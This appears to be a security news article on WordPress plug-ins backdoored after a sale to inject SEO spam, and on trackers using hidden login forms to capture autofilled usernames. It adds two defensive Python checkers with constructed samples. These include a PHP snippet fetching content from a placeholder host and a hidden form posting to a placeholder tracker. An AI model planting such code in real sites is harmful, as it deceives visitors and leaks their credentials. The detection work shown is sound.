In what is becoming an increasingly common type of software supply chain attack, three more WordPress plug-ins that recently changed ownership were backdoored by their new owners. Worse, the malicious code went undetected for months.
The rogue plug-ins are called Duplicate Page and Post, No Follow All External Links and WP No External Links and they all have been removed from the official WordPress plug-in repository over the past couple of weeks. At the time of their removal, they were installed on tens of thousands of WordPress websites.
According to an analysis by researchers from website security firm Wordfence, all of the plug-ins were purchased over the past six months by the same actor with the explicit goal of backdooring them. The malicious code added by the new owner pulls spam content from a third-party server and displays it to visitors and search engine crawlers.
This practice is known as Search Engine Optimization (SEO) spam, and its goal is to artificially inflate the search ranking of certain pages by injecting links to them into other websites without authorization.
The backdoor code in two of the plug-ins contacts the same content server, and information obtained by the Wordfence researchers suggests that all three plug-ins were bought by a U.K. company called Orb Online that describes itself as a “digital marketing agency, specializing in SEO, eCommerce and Magento web development.”
Last week, Wordfence discovered a different WordPress plug-in that had been backdoored after being sold by its original author. In that case, the rogue code opened unauthorized administrative access to websites that had the plug-in installed. Nor was it the first time this kind of compromise hit WordPress users.
Because attackers increasingly abuse the trust between users and their software providers, these compromises are hard for companies to detect: the malicious code arrives through the legitimate update channel, published by the plug-in's new owner. Preventing such attacks requires strong software control policies, reviewing and approving software updates before they are deployed, and maintaining a software bill of materials for applications developed in-house, so that a change of ownership in a component can be traced to every system that depends on it.
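One concrete form that update review can take is a diff of the installed plug-in against the proposed update that flags newly added code able to fetch content from an outside server, which is exactly the behavior the backdoored plug-ins above introduced. The following is an added example written for this page; it is not Wordfence's or WordPress.org's code. The two PHP snippets are constructed samples, the hostname is a placeholder, and the list of fetch functions is the reviewer's own assumption about what is worth looking at (all of them are real PHP or WordPress functions).

```python
"""Flag newly added remote-content fetches in a WordPress plug-in update.

Added example for this page (not Wordfence's or WordPress.org's code).
Compares the PHP source of the installed plug-in with the proposed update and
reports added lines that call a function capable of pulling content from a
third-party server. The PHP below is constructed for illustration.
"""
from __future__ import annotations

import difflib
import re

# Real PHP/WordPress functions that can fetch remote content. Which ones to
# watch is an assumption of this example, not an exhaustive rule set.
REMOTE_FETCH = re.compile(
    r"\b(wp_remote_get|wp_remote_post|wp_remote_request|curl_exec|curl_init"
    r"|file_get_contents|fopen|fsockopen)\s*\(",
    re.IGNORECASE,
)
URL_LITERAL = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)


def added_remote_fetches(old_src: str, new_src: str) -> list[dict]:
    """Return the added lines of new_src that call a remote-fetch function.

    Each finding records the line number in the update, the function called
    and any URL literal on that line, so a reviewer sees where content would
    come from. Lines present in both versions are never reported.
    """
    findings = []
    new_lineno = 0
    # ndiff tags: '  ' common, '+ ' added, '- ' removed, '? ' hint line.
    for line in difflib.ndiff(old_src.splitlines(), new_src.splitlines()):
        tag, text = line[:2], line[2:]
        if tag == "? ":
            continue
        if tag in ("  ", "+ "):
            new_lineno += 1          # line exists in the new version
        if tag != "+ ":
            continue
        m = REMOTE_FETCH.search(text)
        if m:
            url = URL_LITERAL.search(text)
            findings.append({
                "line": new_lineno,
                "function": m.group(1),
                "url": url.group(0) if url else None,
                "code": text.strip(),
            })
    return findings


# Constructed sample: the installed version only duplicates a post.
OLD_PLUGIN = """<?php
/* Plugin Name: Example Duplicator (constructed sample) */
function ex_duplicate_post( $post_id ) {
    $post = get_post( $post_id );
    return wp_insert_post( array( 'post_title' => $post->post_title ) );
}
"""

# Constructed sample: the update keeps the old code and adds a footer hook
# that fetches content from an outside host (placeholder hostname).
NEW_PLUGIN = """<?php
/* Plugin Name: Example Duplicator (constructed sample) */
function ex_duplicate_post( $post_id ) {
    $post = get_post( $post_id );
    return wp_insert_post( array( 'post_title' => $post->post_title ) );
}
function ex_footer_content() {
    // Added in the update: content comes from an outside server.
    $resp = wp_remote_get( 'http://content.example.invalid/feed.php?h=' . $_SERVER['HTTP_HOST'] );
    if ( ! is_wp_error( $resp ) ) {
        echo wp_remote_retrieve_body( $resp );
    }
}
add_action( 'wp_footer', 'ex_footer_content' );
"""

if __name__ == "__main__":
    for f in added_remote_fetches(OLD_PLUGIN, NEW_PLUGIN):
        print(f"line {f['line']}: {f['function']} -> {f['url']}")
        print(f"    {f['code']}")
```

Run against the constructed samples, the check reports a single added `wp_remote_get` call on line 9 of the update with the outside URL, while comparing a version with itself reports nothing. A finding is a prompt for a human to read the surrounding code, not proof of a backdoor: legitimate plug-ins fetch remote data too, but a plug-in that never did so before and starts after a change of ownership deserves a closer look before the update is approved.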
Advertisers Use Hidden Login Forms to Discover Users’ Identities
Some advertising and Web analytics firms exploit a known privacy weakness in the password managers built into browsers to discover the usernames of anonymous visitors.
Researchers from Princeton’s Center for Information Technology Policy found tracking scripts on 1,110 websites from the Alexa top 1 million list that inject hidden login forms into pages in order to trick browsers into exposing usernames.
This is a known privacy leak that results from the password managers built into browsers automatically filling in usernames and passwords the user has saved for a site, without waiting for the user to interact with the form. A third-party script included by the page inserts a login form that the visitor never sees, waits for the browser to fill it, and reads back the username field. In the past, attackers have used the same behavior with cross-site scripting attacks to extract such data.
For advertisers, associating a visitor who's not logged in with an email address that's typically used as a username can be valuable and can be used for tracking.
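Since the injected form is, by design, invisible to the visitor, a useful check for a site owner or auditor is to scan the page's markup for password fields that sit inside hidden or off-screen containers. The following is an added example written for this page, not the Princeton researchers' measurement code. It uses a static pass over inline styles and the `hidden` attribute only, so elements hidden by external stylesheets are out of its reach; the sample HTML and the tracker hostname are constructed.

```python
"""Find password inputs that sit inside hidden or off-screen containers.

Added example for this page (not the Princeton researchers' code). The
tracking technique described above injects a login form the visitor never
sees so that the browser's password manager fills it in; this checker walks a
page's HTML and reports every password field whose own or ancestor inline
style (or hidden attribute) takes it out of view. Sample HTML is constructed.
"""
from __future__ import annotations

import re
from html.parser import HTMLParser

# Inline-style patterns that take an element out of view. Styles applied from
# external CSS are not visible to a static check; treat this as a first pass.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
# Elements that never have a closing tag and so must not be pushed on the stack.
VOID_ELEMENTS = {"input", "img", "br", "hr", "meta", "link", "area", "base",
                 "col", "embed", "source", "track", "wbr"}


def _is_hidden(attrs: dict) -> bool:
    style = attrs.get("style") or ""
    return ("hidden" in attrs) or bool(HIDDEN_STYLE.search(style))


class HiddenLoginFinder(HTMLParser):
    """Tracks open elements so a password field inherits its ancestors' hiding."""

    def __init__(self):
        super().__init__()
        self._stack = []            # (tag, hidden_flag) for each open element
        self._form_action = None    # action of the innermost open <form>
        self.findings = []

    def _inside_hidden(self) -> bool:
        return any(hidden for _, hidden in self._stack)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = _is_hidden(a)
        if tag == "form":
            self._form_action = a.get("action")
        if tag == "input":
            itype = (a.get("type") or "text").lower()
            if itype == "password" and (hidden or self._inside_hidden()):
                self.findings.append({
                    "name": a.get("name"),
                    "form_action": self._form_action,
                    "line": self.getpos()[0],
                })
        if tag not in VOID_ELEMENTS:
            self._stack.append((tag, hidden))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag, tolerating unclosed children.
        for i in range(len(self._stack) - 1, -1, -1):
            if self._stack[i][0] == tag:
                del self._stack[i:]
                break
        if tag == "form":
            self._form_action = None


def find_hidden_password_fields(html: str) -> list[dict]:
    """Return one finding per password input that is hidden or off-screen."""
    p = HiddenLoginFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed page: one legitimate login form, then two hidden password
# fields of the kind an injected tracking form would add.
SAMPLE_PAGE = """<!doctype html>
<html><body>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<script>/* tracker injected the block below */</script>
<div style="position:absolute; left:-9999px; top:-9999px;">
  <form action="https://tracker.example.invalid/collect" method="post">
    <input type="text" name="email">
    <input type="password" name="password">
  </form>
</div>
<div id="promo" style="display: none">
  <input type="password" name="pw2">
</div>
</body></html>
"""

if __name__ == "__main__":
    for f in find_hidden_password_fields(SAMPLE_PAGE):
        print(f"line {f['line']}: password field {f['name']!r} "
              f"in hidden container, form action {f['form_action']!r}")
```

On the constructed page the visible `/login` form is not reported, while the off-screen tracker form (line 11, posting to the outside host) and the `display: none` block (line 15) both are. Because tracking scripts add their forms at run time, the most faithful use of this check is against the DOM as rendered, for instance by saving the page from a browser after scripts have executed rather than scanning the raw server response.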
“Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier,” the Princeton researchers said in a blog post. “A user’s email address will almost never change—clearing cookies, using private browsing mode, or switching devices won’t prevent tracking. The hash of an email address can be used to connect the pieces of an online profile scattered across different browsers, devices, and mobile apps. It can also serve as a link between browsing history profiles before and after cookie clears.”
Until browser vendors address this issue in some way (for example, by filling credentials only after the user interacts with the form), it's probably best for users to disable autofill in the browser's built-in password manager, or avoid using it, and to disable the autofill option in third-party solutions, so that credentials are filled only on an explicit request. To protect their users, website owners can put their login forms on a separate subdomain: password managers tie saved credentials to the site they were saved on, so the browser will not fill them into forms injected on the main site's other pages.